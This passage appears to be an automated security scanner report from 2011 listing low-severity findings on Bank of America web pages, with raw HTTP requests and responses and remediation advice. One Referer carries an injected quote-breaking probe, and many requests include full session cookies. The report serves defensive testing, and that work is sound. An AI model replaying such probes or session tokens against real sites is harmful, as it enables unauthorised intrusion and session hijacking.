SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194

Response

12.3. https://pages.emcom.bankofamerica.com/sourcepoint/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://pages.emcom.bankofamerica.com
Path:	/sourcepoint/

Request

GET /sourcepoint/ HTTP/1.1
Host: pages.emcom.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Oct 2011 13:53:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=; path=/; secure
Vary: Accept
Cache-Control: private
Content-Type: text/html; charset=US-ASCII
Content-Length: 23906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="eng_US">
<head>
<meta http-e
...[SNIP]...

12.4. https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages2/English/ForgotPINNo.asp

Request

GET /Pages2/English/ForgotPINNo.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20833
Content-Type: text/html
Expires: Thu, 06 Oct 2011 13:55:24 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:55:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Personal Identification Number</title>

<meta name="descri
...[SNIP]...

12.5. https://privacyassist.bankofamerica.com/gs/english/Contact.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/gs/english/Contact.asp

Request

GET /gs/english/Contact.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.6. https://privacyassist.bankofamerica.com/gs/english/Policies.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/gs/english/Policies.asp

Request

GET /gs/english/Policies.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15735
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:55:25 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Policies</title>

<meta name="description" content="Bank
...[SNIP]...

12.7. https://privacyassist.bankofamerica.com/neworder.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/neworder.aspx

Request

GET /neworder.aspx HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 778
Content-Type: text/html; charset=iso-8859-1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 06 Oct 2011 13:53:48 GMT
Connection: close

<html><BR><head><BR><title>SwitchPost Page</title><BR></head><BR><body><BR><form id="formt" name="formt" action="NewOrderSet.aspx" method="post"><BR><div id="NoScript" name="NoScript"><table align="ce
...[SNIP]...

12.8. https://www2.bankofamerica.com/cferror.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www2.bankofamerica.com
Path:	/cferror.cgi

Request

POST /cferror.cgi HTTP/1.1
Host: www2.bankofamerica.com
Connection: keep-alive
Content-Length: 657
Cache-Control: max-age=0
Origin: https://www2.bankofamerica.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www2.bankofamerica.com/promos/jump/greatdeals/?cac4f%22%20a%3db%207ef568e4941=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; bac_persist=3041310379.47873.0000; NSC_CbolPgBnfsjdb=445b32097852; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; throttle_value=72; state=CT

URL=https%3A%2F%2Fwww2.bankofamerica.com%2Fpromos%2Fjump%2Fgreatdeals%2F%3Fcac4f%2522%2520a%253db%25207ef568e4941%3D1&DateTime=Thu+Oct+06+13%3A00%3A17+2011&Template=%2Fwww%2Fbankofamerica%2Fsecure-dat
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 06 Oct 2011 13:39:11 GMT
Content-type: text/html
P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
X-Cnection: close
Content-Length: 13252

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="Description" content="Page
...[SNIP]...

12.9. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyInitPopupAction.go

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 12:59:14 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 532

                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?
...[SNIP]...

12.10. https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/insurance/surveyInitPopupAction.go

Request

GET /insurance/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@inpa@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/insurance/property-and-auto/overview.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; state=CT; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; JSESSIONID=0000RTNuokUto4PXIF7QXQuMceW:14b1t9p98

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 12:58:51 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: SAMEORIGIN
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 530

                       function show_survey_popup()
       {
           var popup_url = "/insurance/insurance/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cu
...[SNIP]...

13. HTML does not specify charset previous next
There are 2 instances of this issue:

https://idprotect.bankofamerica.com/code.asp
https://privacyassist.bankofamerica.com/gs/english/

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

13.1. https://idprotect.bankofamerica.com/code.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Request

GET /code.asp?Fr=Re HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8254
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:03 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...

13.2. https://privacyassist.bankofamerica.com/gs/english/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/gs/english/

Request

GET /gs/english/ HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 13:55:25 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

14. Content type incorrectly stated previous
There are 4 instances of this issue:

http://factsaboutfees.bankofamerica.com/assets/img/favicon.ico
http://homeloans.bankofamerica.com/dynamic/vars.jsp
https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go
https://www9.bankofamerica.com/insurance/surveyInitPopupAction.go

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

14.1. http://factsaboutfees.bankofamerica.com/assets/img/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

14.2. http://homeloans.bankofamerica.com/dynamic/vars.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://homeloans.bankofamerica.com
Path:	/dynamic/vars.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /dynamic/vars.jsp HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://homeloans.bankofamerica.com/en/home.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; NSC_CbolPgBnfsjdb=445b32097852; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; state=CT; JSESSIONID=475F62F0B39EAB83BB580E4F6C4552A9; CMAVID=50021315153052143970353; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:42:02 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 290

   cd1_afid = 'default';
   cd1_afid_tfn = '1.800.909.8217';
   cd1_query_string = '';
   cd1_mlo_nbkid = "";
   cd1_mlo_nmlsid = "";
   cd1_mlo_contact_name = "";
   cd1_mlo_state = "";
   cd1_mlo_website_contact_m
...[SNIP]...

14.3. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyInitPopupAction.go

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; 